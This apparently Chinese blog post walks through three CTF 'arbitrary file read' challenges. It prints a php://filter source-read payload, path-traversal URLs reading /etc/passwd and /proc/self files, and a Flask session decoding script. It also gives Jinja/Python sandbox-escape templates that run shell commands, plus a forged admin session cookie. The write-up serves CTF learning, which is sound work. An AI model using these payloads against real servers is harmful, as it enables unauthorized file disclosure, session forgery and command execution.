2021-03-24-每日一题(任意文件读取)

任意文件读取

概念:攻击者通过一些手段读取服务器上开发者不允许读到的文件,包括服务器的配置文件、文件形式存储的密钥、服务器信息、历史命令等等。

任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重要文件。严重的话,就可能导致SSRF,进而漫游至内网。

  • 存读取文件的函数

  • 读取文件的路径用户可控,且未校验或校验不严

  • 输出了文件内容

readfile()file_get_contents()fopen()中,$filename没有经过校验或者校验不合格,用户可控制变量读取任意文件,如/etc/passwd./index.php/config.ini

《从0到1 CTFer成长之路》

afr1——filter为协议

打开网址看到下面的输出,注意到参数p,一看就是任意文件读取漏洞

hello.png

试试flag(不带后缀,因为“hello”就没有后缀),输出nonono


base64.png
no.png

下面使用“绝招”读源码:
?p=php://filter/read=convert.base64-encode/resource=flag

filter.png

base64解码得到flag : n1book{afr_1_solved}

afr2——目录穿越

打开之后是一个gif图像,查看源码看一下

gif.png

看到gif的目录是img/img.gif试着访问一下

img.png

可以看到图片

图.png

继续缩短目录,发现img目录是可以访问的

缩短.png

尝试改成/img../, 发现穿越到了上级目录:

Nginx目录穿越漏洞:Nginx反向代理,静态文件存储在/home/下,而访问时需要在url中输入files,配置文件中/files没有用/闭合,导致可以穿越至上层目录。这个/就导致我们可以从/home/目录穿越到他的上层目录

使用filename参数加载图像文件,图片文件位置可能映射在 /var/www/images/ 上,所以真实的路径是 /var/www/images/214.png ,这样构造url即可实现穿越?filename=../../../etc/passwd

flag.png

直接打开flag目录,获得flag: n1book{afr_2_solved}

final.png

afr3——flask的session伪造

三个页面,连贯的操作

a.png
b.png
c.png

最后一个页面的URL如下:

cc.png

看到name=artical,试试换成别的比如“aa”,显示没有这个文件,整个目录都暴露了

d.png

下面试试name=flag.php(name=flag也是no permission),有这个文件,但是没有访问权限。

permission.png

看看了别人的WP,发现需要用flask的session伪造获取flag

https://github.com/mo-xiaoxi/CTF_Web_docker/tree/master/HCTF2018/Hideandseek,这道题也用到了这个方法,有机会复现一下。WP:https://www.jianshu.com/p/d20168da7284

修改session,伪造admin用户,伪造session一定要密钥!!!

Flask加密脚本:https://github.com/noraj/flask-session-cookie-manager

首先看看现在的session形式(F12):

session.png

解密看一下session的格式,解密脚本:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
 payload, sig = payload.rsplit(b'.', 1)
 payload, timestamp = payload.rsplit(b'.', 1)

 decompress = False
 if payload.startswith(b'.'):
 payload = payload[1:]
 decompress = True

 try:
 payload = base64_decode(payload)
 except Exception as e:
 raise Exception('Could not base64 decode the payload because of '
 'an exception')

 if decompress:
 try:
 payload = zlib.decompress(payload)
 except Exception as e:
 raise Exception('Could not zlib decompress the payload before '
 'decoding the payload')

 return session_json_serializer.loads(payload)


if __name__ == '__main__':
 print(decryption("eyJuMWNvZGUiOm51bGx9.YFr4cQ.gICS3BUHd4fvIyDIX_HveI4LESg".encode()))
none.png

输出{'n1code': None},猜测把None改成admin试试,不对,正确的session应该是:

# 执行任意命令
{'n1code': "{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat flag.py').read()}}"}

下面是几个常用的注入模板(python沙箱逃逸?):

1. ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
2. ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
3. ''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' )

下一步是重新加密,密钥key在key.py, 怎么知道有key.py这个文件的呢.

第二个知识点:Linux系统中的\proc\目录

关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。

  • /proc/[pid],当查看当前进程的时候可以用/proc/self代替,self是当前运行进程ID的符号链接
  • cmdline — 启动当前进程的完整命令,但僵尸进程目录中的此文件不包含任何信息
  • cwd — 指向当前进程运行目录的一个符号链接
  • environ — 当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示
payload:article?name=../../../proc/self/cmdline

回显python server.py。

pythonserver.png

读取这个文件:因为不知道当前的路径,无法通过路径读取,所以通过当前进程的工作目录来读取。

payload:article?name=../../../proc/self/cwd/server.py
all.png

看到有两个文件flag.pykey.py。查看key.py的内容

payload:article?name=../../../proc/self/cwd/key.py
key.png

得到key:Drmhze6EPcv0fN_81Bj-nA

利用session加密脚本,以key为密钥,加密新构造的session,得到新的伪造出的session

encode.png

session:.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YFsCVw.rubo5Ztr2NoXcmWOAJRZ-STUXrY

通过burpsuit修改session,得到flag:n1book{afr_3_solved}

afr3.png

(需要注意的是,抓的包应该是第一个页面,不是一直操作的第三个页面)

参考资料

https://blog.csdn.net/qq_43625917/article/details/102617154

https://blog.csdn.net/Youth____/article/details/111171019

https://blog.csdn.net/wuyaowangchuan/article/details/109784072

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,240评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,328评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,182评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,121评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,135评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,093评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,013评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,854评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,295评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,513评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,678评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,398评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,989评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,636评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,801评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,657评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,558评论 2 352

推荐阅读更多精彩内容